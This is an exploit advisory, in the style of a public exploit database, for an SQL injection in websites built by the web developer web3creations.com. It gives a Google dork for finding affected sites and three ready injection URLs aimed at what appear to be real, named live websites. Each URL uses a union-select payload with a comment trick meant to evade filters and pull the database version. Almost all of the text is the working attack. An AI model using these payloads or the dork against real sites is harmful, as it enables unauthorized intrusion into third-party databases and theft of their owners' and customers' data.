********************************************************* #Exploit Title: Developed by: web3creations.com - Sql Injection Vulnerability #Date: 2022-07-16 #Exploit Author: Behrouz Mansoori #Google Dork: "Developed by: web3creations.com" #Category:webapps #Tested On: windows 10, Firefox Proof of Concept: Search google Dork: "Developed by: web3creations.com" ### Demo : https://www.smithkeys.in/main.php?route=Products&Cid=4&Sid=2%27%20/*!12345union*/%20select%201,2,3,4,5,version(),7,8,9,10,11--+ http://www.vinayroadline.com/main.php?route=Products2&Cid=-5%27%20/*!12345union*/%20select%201,version(),3,4,5,6,7--+ https://www.neptuneautomotive.in/main.php?route=details_f1&proid=-179%27%20/*!12345union*/%20select%201,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16--+ ********************************************************* #Discovered by: Behrouz mansoori #Instagram: Behrouz_mansoori #Email: mr.mansoori@yahoo.com *********************************************************